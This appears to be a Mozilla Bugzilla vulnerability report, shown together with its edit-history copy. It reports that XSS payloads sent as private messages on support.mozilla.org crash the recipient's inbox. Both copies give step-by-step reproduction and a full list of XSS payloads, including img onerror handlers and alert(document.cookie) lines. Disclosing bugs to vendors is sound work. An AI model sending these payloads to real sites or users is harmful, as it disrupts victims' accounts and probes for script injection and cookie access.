Payload XSS (minor) to Crash Messages Inbox

1. Log in to the website https://support.mozilla.org/
2. Go to https://support.mozilla.org/id/messages/new
3. Send to the Victim account with the payload below

=============================================
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
\<a onmouseover="alert(document.cookie)"\>xxs link\</a\>
\<a onmouseover=alert(document.cookie)\>xxs link\</a\>
<IMG SRC=# onmouseover="alert('xxs')">
<IMG onmouseover="alert('xxs')">
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
<img src=x onerror="javascript:alert('XSS')">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC="jav
ascript:alert('XSS');">
=============================================

4. After sending, the Messages menu of the victim user crashes and shows this error notification:

   An Error Occurred
   Oh, no! It looks like an unexpected error occurred. We've already notified the site administrators. Please try again now, or in a few minutes.

5. This is not a denial-of-service attack or rate limit, because this payload impacts only users of support.mozilla.org

Impact: The new messages menu on support mozilla can send to all support user accounts. An attacker can send the crash-messages payload to all support mozilla user accounts, and all users cannot open the messages menu on https://support.mozilla.org/id/messages/

## Supporting Material/References:

Because the proof of concept video file is too big, I uploaded it to YouTube with the setting not public: https://youtu.be/IHAByCLG5Xg

Thanks
Bug 1762414 Comment 0 Edit History
Note: The actual edited comment in the bug view page will always show the original commenter’s name and original timestamp.
Payload XSS (minor) to Crash Messages Inbox

1. Log in to the website https://support.mozilla.org/
2. Go to https://support.mozilla.org/id/messages/new
3. Send to the Victim account with the payload below

```HTML
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
\<a onmouseover="alert(document.cookie)"\>xxs link\</a\>
\<a onmouseover=alert(document.cookie)\>xxs link\</a\>
<IMG SRC=# onmouseover="alert('xxs')">
<IMG onmouseover="alert('xxs')">
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
<img src=x onerror="javascript:alert('XSS')">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC="jav
ascript:alert('XSS');">
```

4. After sending, the Messages menu of the victim user crashes and shows this error notification:

   An Error Occurred
   Oh, no! It looks like an unexpected error occurred. We've already notified the site administrators. Please try again now, or in a few minutes.

5. This is not a denial-of-service attack or rate limit, because this payload impacts only users of support.mozilla.org

Impact: The new messages menu on support mozilla can send to all support user accounts. An attacker can send the crash-messages payload to all support mozilla user accounts, and all users cannot open the messages menu on https://support.mozilla.org/id/messages/

## Supporting Material/References:

Because the proof of concept video file is too big, I uploaded it to YouTube with the setting not public: https://youtu.be/IHAByCLG5Xg

Thanks